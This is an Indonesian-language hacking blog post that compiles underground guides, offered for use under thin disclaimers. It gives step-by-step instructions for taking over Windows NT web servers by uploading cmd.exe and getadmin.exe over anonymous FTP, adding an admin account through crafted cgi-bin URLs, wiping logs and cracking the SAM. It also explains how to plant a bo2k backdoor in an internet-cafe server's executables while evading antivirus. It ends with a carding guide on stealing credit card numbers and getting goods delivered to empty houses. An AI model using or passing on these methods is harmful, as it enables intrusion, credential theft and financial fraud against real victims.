Jumat, 29 Agustus 2008

Resep Cepat : Menggasak NT dari jauh

Resep Cepat : Menggasak NT dari jauh



oleh putra_leppindo

Pingin iseng nyobain ngehack NT? Ingat selalu: "UNIX bukanlah segalanya!" Justru sekarang makin banyak perusahaan-perusahaan, bahkan ISP-ISP besar (seperti indo.net) yang menjadikan NT platform pilihan untuk webhosting mereka. Nah, berikut sedikit info dari pengalaman gue ngisengin server NT, dengan info-info sebagian besar dicolong dari berbagai "newbie textfile".


Bahan-bahan
===========
Mesin yang lumayan (sekitar 486-66 keatas)
Sistem operasi Windows NT (nggak mutlak, tapi jelas lebih sedap kalo
nge-hack lewat OS yang sama - toh CD bajakan banyak beredar dimana-mana).
Sebuah webbrowser (sebaiknya IE, supaya hack kita betul-betul 100%
Microsoft-sponsored heheheh …).

RAS dan koneksi dialup ke internet.
Jangan lupa file-file:
GetAdmin.exe dan file dukungan gasys.dll
L0phtCrack
(semua tersedia di http://www.chacosite.com/download//)


Mulai NgeHack
=============
Mulai seperti biasa, dengan membuka koneksi ke ISP kamu. Setelah itu, buka jendela "Command Prompt", dan mulai bekerja. Anggap kita sudah tahu bahwa www.company.com menjalankan IIS (untuk daftar target, coba cari lewat search engine yang memanfaatkan spider (altavista, excite). Biasanya file help IIS ikut terdokumentasi disitu. Nah, sekarang kita coba (untung-untungan, nih) untuk ftp ke server tersebut:

C:\ftp www.company.com

connected to www.company.com

220 manado Microsoft FTP Service (Version 3.0)

User (www.company.com:(none)):

Koneksi ini memberikan info yang cukup penting: Nama NetBIOS dari sang server: MANADO. Dari sini bisa kita ketahui nama dari account internet anonimus yang digunakan oleh NT untuk menjalankan layanan WWW, FTP, dan Gopher di mesin tersebut.

Jika account default belum diganti, dan memang jarang sekali account seperti ini diganti, biasanya account internet anonimusnya adalah:
IUSR_SATURN. Informasi ini akan kita perlukan di masa yang akan datang saat kita mencoba mencuri akses Administrator ke dalam sang mesin. Nah, coba masukkan "anonymous" sebagai nama user:

331 Anonymous access allowed, send identity (e-mail name) as password.

Password:

Nah, terkadang ada juga gunanya kita masukkan "guest" sebelum mencoba "anonymous" sebagai username. Secara default, akses "guest" di NT tertutup, namun ada saja SysAdmin tolol yang membuka akses "guest" dan biasanya dibarengi dengan password "guest" atau malah kosong sama sekali.
Nah, jika kamu berhasil masuk ke layanan FTP sang server melalui account ini, maka segala yang bisa diakses oleh "guest", bisa juga diakses olehmu.

Dapat akses
===========
Sekarang kita sudah bisa mengakses site target, tapi jalan masih panjang. Untuk selanjutnya, kita coba untuk mengetik "cd /c" di prompt ftp. Banyak admin yang membuat root direktori C:\ dijadikan direktori ftp virtual dan membiarkan "alias name"-nya "/c" sebagai default. Sekarang coba kita "put"
file ke direktori tersebut. Kalau emang nasib kamu bagus, maka kamu punya akses "write" ke direktori tersebut! Selanjutnya, kamu bisa seperti biasa me="dir" untuk melihat - lihat isi dari server sasaran kamu. Kalau kebetulan kamu melihat direktori "cgi-bin", maka jelas langkar pertama adalah tertawa terbahak-bahak, sebab sang Webmaster dari mesin ini rupanya meletakkan direktori ini bersama file-file websitenya (mungkin dengan tujuan agar dia bisa melakukan "remote changes" terhadap situs web tsb.)


CGI-BIN mempunyai perizinan "Execute", yang artinya segala program di direktori cgi-bin bisa dieksekusi melalui web browser kita. Seringkali kita terbentur, jika sang Webmaster menggunakan NTFS file-level security, maka mustahil bagi kita untuk masuk ke cgi-bin lewat akses anonimus.

Ganti direktori ke CGI-BIN ("cd cgi-bin") dan persiapkan ftp untuk transmisi file tipe biner ("binary"). Nah, coba kirim file cmd.exe ("put cmd.exe"). Jika ladyluck masih menemani, kamu akan melihat:

200 PORT command successful.

150 Opening BINARY mode data connection for CMD.EXE.

226 Transfer complete.

208144 bytes sent in 0.06 seconds (3469.07 Kbytes/sec)

Lanjutkan dengan mengirimkan "getadmin.exe" dan "gasys.dll" ke direktori yang sama. Nah, setelah ketiga file ini ter-upload, tutup koneksi, dan silakan ngerokok dulu. Kalau kamu kebetulan punya account AOL atau ISP lain yang memanfaatkan proxy, segera koneksi kembali ke internet lewat ISP
tersebut (untuk menghindari dicatatnya alamat IP kamu oleh fasilitas logging NT). Tapi jangan terlalu khawatir, sebab saat kamu berhasil mendapatkan Administrator, maka kamu bisa menghapus segala jejak. Nah, sekarang bukalah browser kamu dan masukkan URL berikut:

http://www.company.com/cgi-bin/getadmin.exe?IUSR_MANADO

Setelah kira-kira 15 detik, akan muncul:

CGI Error

Wah, rupanya aplikasi CGI yang bersangkutan memberikan pesan error, dengan sedikit tambahan:

Congratulations , now account IUSR_MANADO have administrator rights!

Heheheh. Kamu baru saja menjadikan account anonimusmu berpangkat sama dengan sang administrator sistem lokal. Sekarang kamu bisa melakukan hal apapun yang kamu inginkan, namun, tugas pertama adalah membuat account untuk kamu sendiri supaya kamu bisa menghubungi mesin targetmu lewat Windows Explorer dan utilitas-utilitas administratif lainnya. Kamu tidak bisa menggunakan account IUSR_SATURN sebab kamu tidak tahu password acaknya.

Untuk membuat account baru, gunakan URL:

http://www.company.com/cgi-bin/cmd.exe?/c%20c:\winnt\system32\net.exe%20user%20iwan%20ngepet%20/add

Kamu baru saja berhasil membuat sebuah account bernama "iwan" dengan password "ngepet". Untuk membuat account kamu berpangkat administrator, maka kamu bisa menggunakan URL:


http://www.company.com/cgi-bin/getadmin.exe?iwan

Setelah itu, tinggal kita klik tombol "Start" dan lewat "Find" cari komputer yang bernama www.company.com. Setelah komputer tersebut ditemukan, kamu tinggal klik tombol kanan dan klik "Explore". Mesin kamu kan memulai NT Explorer dan kamu akan ditanya nama user dan password.
Masukkan "iwan" dan "ngepet" (atau nama manapun juga yang kamu berikan lewat URL diatas).

Sekarang kamu sudah terhubung ke mesin sasaran, dengan segala hak yang dimiliki oleh seorang admin. Dengan menggunakan "User Manager for Domains" kamu bisa mengambil seluruh informasi account; kamu bisa membuka "Internet Service Manager"; kamu bisa melihat "Server Manager"; namun sekarang mari kita coba untuk menghapus seluruh jejak. Lewat Eksplorer, pergilah ke
direktori Winnt\system32\logfiles dan hapus seluruh jejak kamu. Jika kamu mendapat pesan "sharing violation", cukup ganti tanggal komputer dengan URL:


http://www.company.com/cgi-bin/cmd.exe?/c%20date%2002/02/98

Dengan menggunakan "Registry Editor", buka registri mesin target kamu, dan dengan menggunakan L0phtcrack, "dump" informasi SAM (Security Accounts Manager) di mesin tersebut dan mulailah meng-crack seluruh password di dalam mesin tersebut. Karena L0phtCrack menghabiskan banyak tenaga CPU, jangan lupa untuk mengeset prioritasnya ke "Low" lewat Task Manager. Untuk
memastikan bahwa kehadiran kamu didalam sistem tidak akan terdeteksi, hapus file cmd, getadmin, dan gasys.dll dari cgi-bin, dan lewat Event Viewer, periksa seluruh log "security event". Akhirnya, dengan menggunakan User Manager for Domains, hapus privilese admin dari account IUSR_SATURN
dan hapus account "iwan" yang baru saja kamu buat. Toh, kamu tidak akan membutuhkannya lagi. Sebelum kamu meninggalkan sang mesin, jangan lupa untuk mengeset prioritas L0phtCrack ke "High" supaya segala password bisa lebih cepat di-crack. Selamat bobo …



Eksploit



Sekarang tentunya kamu sudah asyik bermain-main dan bereksperimen dengan shell UNIX baru yang baru kamu 'dapatkan'. Dan mungkin sekarang kamu sudah mulai bertanya-tanya, "apa sih eksploit (exploit, 'sploits) itu?". Dalam konteks per-hacking-an, eksploit tidaklah jauh berbeda dengan artinya dalam konteks harfiah, yaitu 'pemanfaatan'. Tentunya eksploit-eksploit 'hacking' lebih spesifik lagi, yang kurang lebih bisa diartikan sebagai 'pemanfaatan kelemahan dari sebuah sistem untuk tujuan-tujuan yang diluar dari penggunaan normal.' Kelemahan-kelemahan ini bisa berupa kesalahan pemrograman, sesuatu yang tidak direncanakan oleh pemrogram asli, dan
lain-lain. Umumnya, yang jelas paling menarik perhatian kita, adalah eksploit yang akan memberikan kita akses tidak terbatas ke seluruh aspek dari sebuah sistem. Dalam UNIX, sering kita dengar istilah 'mengeksploit program anu untuk mendapat privilese root'. Tentu saja mendapatkan 'root' bukanlah satu-satunya tujuan pengeksploitan sistem. Seperti yang mungkin anda sudah alami sendiri, kadang sebuah cacat dalam program seperti maild atau ftpd bisa dimanfaatkan untuk tujuan 'header forging', 'ip spoofing', 'denial of service attack', dan 'mail bombing' (hello, Anton Pardede!).

Eksploit secara besar sering dibagi menjadi dua, yaitu eksploit lokal dan eksploit remote. Eksploit lokal adalah jenis eksploit yang hanya bisa dijalankan jika kamu sudah punya akses ke dalam suatu sistem (baik itu melalui login telnet, ftp, dll). Eksploit jenis ini jumlahnya banyak, sebab kamu sudah punya akses ke ribuan program yang berpotensi untuk di-eksploit. Contoh - contoh dari eksploit jenis ini adalah buffer overflow (i.e. mh di RedHat 5, SuperProbe, dll), race conditions (dimana dua proses saling berlomba untuk menyelesaikan tugas masing-masing, biasanya proses A disuruh untuk menjalankan suatu utilitas yang membutuhkan privilese root temporer sementara proses B dirancang untuk mencegat proses A sebelum proses A kembali statusnya ke privilese user biasa, mengakibatkan di-spawn-nya shell beridentitas root - sering terjadi di mesin-mesin IRIX dan SunOS.) Bagaimana caranya agar saya bisa mendapatkan eksploit seperti ini? Tentu saja kamu bisa menghabiskan waktu berjam-jam untuk mengutak-utik sebuah program sampai berhasil kamu jebol (lebih baik dilakukan di kotak kamu sendiri), seperti para 'elite' lainnya. Biasanya eksploit diprogram dengan C, perl, atau sh. Namun kalau ilmu kungfu kamu masih kayak kami (dan emang bawaannya malas), banyak eksploit yang sudah didokumentasi dan tersedia melalui websearch, atau di situs-situs tertentu, seperti:
http://www.rootshell.com
http://www.antionline.com
http://www.rhino9.com
http://www.dhp.com/~fyodor
atau di situs Saya www.chacosite.com/download/hecker/

Eksploit jenis satunya lagi adalah eksploit remote, dimana kamu bisa mengeksploit sistem tanpa mengetahui otorisasi user/password. Tentu saja eksploit-eksploit jenis ini jauh lebih sedikit jumlahnya, dan terkadang dampaknya juga tidak separah eksploit lokal. Lubang cgi phf adalah salah satu contoh dari pemanfaatan eksploit remote untuk mendapatkan file /etc/passwd (dulu LithErr pernah memberi resep cepat memanfaatkan phf). Mungkin belum terlihat fatal, namun sekalinya sang 'cracker' berhasil masuk ke dalam sistem memanfaatkan login dan password dari salah seorang user, maka dia bisa menjalankan eksploit-eksploit lokal untuk mendapatkan akses tak terbatas milik root. Eksploit port 143 (IMAPd) malahan lebih gila lagi, dengan memberikan akses root tanpa password. Apa trik dan tip yang kira-kira berguna untuk memanfaatkan eksploit-eksploit remote? Jelas sebuah portscanner sangatlah bermanfaat untuk melihat port-port mana saja yang menerima koneksi. Beberapa jenis 'scanner' lebih terfokus lagi, seperti cgi scanner dari kecoak (roachscan) yang saat dijalankan akan memeriksa direktori cgi-bin dari sejumlah server sekaligus, mencari file password atau jalan masuk lainnya, melalui beberapa jenis eksploit umum.
Satu program lain yang mungkin ada gunanya adalah 'netcat', bisa didapat dari http://www.l0pht.com. Untuk menghemat waktu, banyak cracker yang menulis skrip otomasi, jalankan skrip, tinggal berikan daftar target-target dan tinggalkan untuk sementara waktu. Kembali lagi sejam atau dua jam kemudian, tinggal diperiksa server-server mana saja yang ada lobangnya, bisa dieksploit atau tidak, dll (coba lihat artikel-artikel mengenai scanning/probing di situs-situs hacker).


Terkadang ada juga eksploit yang tidak begitu jelas jenisnya, seperti eksploit lynx mailer, yang walaupun kodenya sendiri terletak di host lain, namun untuk digunakan masih perlu campurtangan dari user lokal untuk bisa bekerja (saat user meng-click sebuah link, sang eksploit akan mengirimkan file password ke alamat email tertentu.)

HACK WARNET



Pertidaktanggungjawaban :
Artikel ini ditulis untuk menambah pengetahuan tentang keamanan sistem
komputer terutama para operator / SysAdmin dari server warnet, penulis
tidak bertanggung jawab bila artikel ini digunakan untuk kejahatan apapun
bentuknya.

Tools : - Backdoor Program , i.e: bo2k, netbus
- Portscanner
- Nekat !

CARA : - Jelajahi warnet yg ada di kotamu, perhatikan apakah di server komputer ada drive utama yang di-mount.

(Setidaknya server harus ber-os MicroShit Windows 98/NT).
- Siapkan program backdoor kamu yang sudah kamu konfigurasi , agar tidak dikenali disarankan program backdoornya di recompile ulang agar tdk dikenali oleh
antivirus, tambahkan data sampah sesuka kamu, jika tidak kamu recompile juga tdk apa-apa tetapi program akan mudah dikenali oleh antivirus.
- Cari program .exe yang biasanya sering dipakai oleh operator warnet, i.e:Mirc32.exe, iexplore.exe dll.
- Copy file tersebut di komputer client warnet, sisipkan backdoor kamu ke program tersebut pake silkrope (Baca petunjuknya di press release bo2k , http://www.bo2k.com ).
- Delete file original di komputer server (Hati - hati jika tdk bisa kemungkinan program sedang dipakai, pake program lain spt iexplore.exe ).
- Setelah mendelete file asli di komputer server, copykan file yang sudah disisipi backdoor dari komputer client warnet ke komputer server, tentunya dengan memakai nama asli program seperti Mirc32.exe atau iexplore.exe.
- Logout dari client warnet dan bayar sewa internet. (Pasang muka lugu dan bego).
- Setelah sehari dirasa cukup maka kembali lagi ke warnet yang di-hack dan lakukan
scanning port yang terbuka, jika port yang terbuka match dengan konfogurasi backdoor kamu maka ..... SELAMAT BUNG !! Anda layak tertawa..... hi....hi...hi....., backdoor anda telah dijalankan oleh operator warnet yang !! kekekeke.

- Lakukan penjelajahan sepuas kamu....., list password jika server warnet NT dan crack pakelophtcrack, jika server windows 9x..... tertawalah lagi sampai akan muntah dan kejang - kejang.. ;p ,karena jika di list passwordnya akan didapati password dial-up ke ISP tanpa "ENCRYPT" sama sekali..

- Having fun..... and stay out of troble ..dan ingat "Junjunglah Etika HACKER", jangan sekali -kali membuat kerusakan, cukup untuk kamu lihat - lihat server warnet...OK : ) .

>>>>> Pertanyaan, saran, kritik serta berbagai umpatan kotor dapat dialamatkan
ke: chaco@yahoo.com
(salam buat mbah_e,katoda,krembiz,bastard truth,social sterility,gedhi,cessy,wan abudz,stembase,and stc....)
(fuck for abal-abal ,taek-taek,bedhes-bhedes,yang mengkomersialkan ilmu pengetahuan di dunia ini,para koruptor,bangsat-bangsat microshit,dll yang membuat dunia ini jadi kotor karena ulah mereka)


Bye..........

Amankah Kartu Kredit Ini?



[Catatan Redaksi:
Segala informasi yang dimuat di artikel ini hanyalah untuk digunakan
sebagai bahan referensi untuk tujuan pengetahuan saja. Jika kamu
memutuskan untuk melakukan tindak kejahatan, hal itu diluar tanggung
jawab 'kecoak elektronik'. Informasi bukanlah kejahatan. Mengetahui
cara berbuat sesuatu *BUKANLAH* kejahatan. Gunakan informasi ini untuk
melindungi diri kamu sendiri.]

Semenjak dipopulerkannya sistem kartu kredit sekitar tahun 70-an dulu, semakin banyak orang yang menggunakan sistem pembayaran kartu kredit sebab kartu kredit dianggap lebih praktis untuk dibawa-bawa dan lebih mudah sebab sistem pembayarannya adalah online. Di Amerika, Kanada dan negara-negara Eropa, kartu kredit adalah hal yang sangat lumrah digunakan,
bahkan oleh para pelajar SMA sekalipun. Di Indonesia, biar bagaimanapun, kartu kredit masih dipandang sebagai simbol status. Dulu saya ingat di waktu saya masih SMA di Lampung ada teman yang punya kartu kredit dan tiap hari diporotin oleh anak-anak. Beberapa tahun belakangan, dengan makin ramainya 'online business' di Indonesia, semakin meluaslah pemakaian kartu kredit sebagai sistem pembayaran, terutama di kota-kota metropolitan seperti Jakarta, Medan dan Surabaya.

Bagaimana kartu kredit bisa jatuh ke tangan orang lain.
=======================================================

Pada prinsipnya, sang kartu sendiri (plastik) sangat jarang didapatkan. Hal ini sebab orang beranggapan, jika kartu kreditnya disimpan di lemari dan hanya dikeluarkan pada saat ingin digunakan, maka akan sangat susah untuk menyalah gunakan kartu tsb. Ini adalah kesalahan yang cukup besar. Pada pokoknya, jika kamu ingin melakukan kejahatan penyalahgunaan kartu kredit, yang diperlukan adalah *nomor* kartu tersebut, beserta nama pemiliknya (banyak juga bisnis yang meminta tanggal kadaluwarsa, namun di Internet, biasanya kamu bisa lolos menggunakan nomor dan nama saja, asalkan tanggal kadaluwarsa diisi (dikarang-karang) paling tidak enam
bulan didepan).
Bagaimana caranya memperoleh nomor-nomor kartu kredit ini ??? Di negara-negara dimana kartu kredit digunakan secara meluas, untuk mendapatkan nomor kartu kredit, biasanya tidak memerlukan ketrampilan khusus. Kamu bisa iseng ngaduk-ngaduk tempat sampah toko grosir atau bisa
coba kerja di pom bensin, dan mendapatkan bon kartu kredit pelanggan. Di Indonesia, hal ini semakin mungkin dilakukan, terutama di pasar-pasar swalayan besar seperti Sogo, segitiga Senen, M Plaza, dll. Biasanya bon penerimaan berupa kertas berwarna yang mencantumkan nama, nomor kartu kredit, berapa total harga, dan seterusnya. Jika kamu seorang perempuan, itu lebih bagus lagi. Cari kerjaan sebagai kasir dan sempatkan diri untuk menyalin nomor-nomor tersebut. Perempuan juga jarang dicurigai ;-). Mengaduk-ngaduk tempat sampah juga bisa berguna, sebab selain bisa mendapatkan salinan bon, jika kamu ngaduk-ngaduk tempat sampah di dekat
bangunan ISP, kamu juga bisa mendapatkan password/login, dll (lihat artikel 'Trashing dan Social Engineering'). Metode mutakhir yang sekarang banyak digunakan di negara-negara maju
adalah dengan cara menggunakan perangkat 'surveillance' untuk mendapatkan nomor kartu kredit calon korban. Tentu saja jika kamu berhasil mendapatkan akses ke database milik ISP atau Web komersil, kamu bisa memanen ratusan bahkan ribuan nomor kartu kredit dari situ.

Sudah dapat kartunya, lalu?
===========================

Umumnya, para kriminil tingkat kecil-kecilan yang berhasil mendapat nomor kartu kredit milik orang lain menggunakannya untuk kebutuhan pribadi. Hal ini masih agak sulit dilakukan di Indonesia sebab masih jarang bisnis komersil yang bersedia menerima pembayaran kartu kredit tanpa mengecek detailnya. Di Kanada sini, cara yang banyak dipraktekkan adalah sbb:

- temukan rumah kosong / yang lagi ditinggalkan penghuninya untuk jangka
waktu yang lama
- buka katalog-katalog barang-barang menarik yang diinginkan
- telepon sang penjual, bayar dengan kartu kredit tsb (perlu tgl
kadaluwarsa, dan biasanya alamat sang empunya kartu).
- minta diantarkan ke alamat rumah kosong tadi (atau, lebih bagus lagi,
kamar hotel), dan minta 'express delivery' (hari berikutnya)
karang alasan seperti: perlu mendadak untuk presentasi lusa, atau
tetek bengek lainnya. gunakan social engineering.
- tunggu kedatangan barangnya.
- ambil barangnya, dan ... CABUT!

Dengan cara ini kadang-kadang para kriminil (umumnya anak ABG) bisa mendapatkan laptop Tilamook terbaru bernilai $5000. Sang pemilik kartu sendiri pada saat mengetahui bahwa kartunya telah disalah gunakan tidak akan dikenakan biaya apa-apa, selain mungkin administrasi pengurusan kasus, yang nilainya tidak sampai $50. Dengan makin maraknya servis internet, semakin banyak pula kriminil yang men(yalah)gunakan kartu kredit curian untuk mendapatkan servis gratis. Karena komputer itu bodoh, kamu bisa dengan gampangnya mengaku sebagai
pemilik yang sah. Biasanya dengan mengisi 'form' di webpage, kamu bisa registrasi untuk layanan tsb (kalau tidak salah d-net sudah punya fasilitas ini, melalui diffy.com-nya, tapi kurang pasti) atau bisa untuk mengorder sesuatu. Di Indonesia, yang paling sering digunakan oleh para
kriminil jenis baru ini (yang, umumnya adalah cowok ABG) adalah, apalagi kalau bukan, registrasi 'member' untuk klub-klub porno di Internet.


Beberapa anggapan
=================

1. Tidak mungkin saya bisa dilacak, toh, ini Internet, dan tak ada yang melihat. Hampir benar. Mungkin jika kamu hanya menggunakannya untuk pemalsuan kelas teri, akan dibiarkan saja berlalu. Dalam pemalsuan kelas kakap, pun, kamu masih bisa lolos tanpa dilacak. Tapi dengan syarat kamu benar-benar hati-hati. Gunakan line telepon yang bukan milikmu, gunakan account
internet bukan milikmu, dari web gunakan Anonymizer, dll dll (seperti layaknya cracking/intruding). Namun resiko kamu terlacak jelas ada, bahkan di Indonesia sekalipun. Setiap transaksi di Internet merekam nomor IP kamu, walaupun browser kamu tidak diset 'secure'. Anonymizer tidak bersedia melayani protokol https:// (secure HTTP). Dial-in server yang
kamu gunakan punya catatan nomor mana yang memanggil. Dan, kalo dipikir-pikir, jika kamu benar-benar konak, kenapa susah-susah, sih? Toh gambar-gambar kayak gituan banyak tersedia eceran kaki lima. Menggunakan kartu kredit milik orang ada gunanya jika misalnya kamu berhasil
mendapatkan kartu kredit milik Bambang Suharto atau sodara-sodaranya. Nah, itu baru enak, bisa kamu porotin tuh orang-orang yang selama ini morotin rakyat.

2. Kita bisa menggunakan kartu kredit hasil dari 'CC Generator'.
Biasanya tidak benar. Memang, banyak program-program yang beredar di internet dan bisa menghasilkan nomor kartu kredit, namun program-program tsb biasanya bekerja atas dasar logaritma nomor kartu kredit. Dan 'nomor kartu kredit' hasil buatan program-program tsb adalah fiktif. Sedikit servis di Internet yang melakukan check hanya berdasarkan algoritma ini
saja. Pada umumnya servis-servis komersial menggunakan check berdasar: Nama Pemegang Kartu, Nomor Kartu, dan Kode Pos alamat pemegang kartu.


3. Saya sudah berhasil mendapatkan password/login untuk barely.hustler.com (atau sejenisnya) tentunya mulai dari sekarang, saya selalu bisa mengakses site tsb sebagai 'member'. Tidak benar. Biasanya nomor kartu kredit hasil curian mempunyai 'umur hidup' tertentu. Umur hidup ini bervariasi. Kadang-kadang setelah kamu meregistrasi/mengorder barang pada malam hari, keesokan harinya sang perusahaan korban melakukan check, dan menemukan kejanggalan (contoh: Alamat tidak sinkron). Atau bisa juga minggu depannya. Kemungkinan lain adalah sang pemilik kartu kredit yang asli akan menemukan kejanggalan di 'bill' (laporan rekening) kartu kreditnya. Hal ini akan membuatnya waspada dan melaporkan kepada bank/institusi finansialnya. Segera setelah itu, account ilegal kamu akan dimatikan (dan, jika serius masalahnya, bisa
dilakukan pelacakan). Cara yang bisa digunakan untuk memperpanjang 'umur hidup' nomor curianmu antara lain adalah dengan cara menggunakan kartu kredit korporasi (milik perusahaan besar), membatasi transaksi ilegal yang dilakukan (jangan diumbar sekali pakai habisin $200), dlsb.

4. Jangan sekali-kali menggunakan kartu kredit untuk telepon SLJJ/Long Distance.
Cukup benar. Di Amerika, perusahaan-perusahaan seperti Sprint, AT&T, dll menerima kartu kredit sebagai ganti koin untuk layanan telepon jarak jauh, atau bahkan kadang-kadang internasional. Walaupun kamu menggunakan telepon umum, resiko masih ada. Mereka bisa melacak siapa yang kamu telepon. Hal ini tentunya bukan masalah jika kamu menelepon teman kamu yang *juga*
menggunakan telepon umum, atau teman kamu yang tinggal di, ... Libya,misalnya.

Penutup
=======

Kayaknya cukup segini dulu, deh, sebab udah mulai kepanjangan nih. Saran saya kepada kalian yang tertarik untuk menjadi 'professional carder', hati-hatilah selalu. Eksplorasi adalah hal yang baik, tapi pastikan sedapat mungkin kamu tidak merugikan orang lain atau dirimu sendiri. Gitu
dulu, deh. Ciao ...

- Belleville, ON

Tidak ada komentar: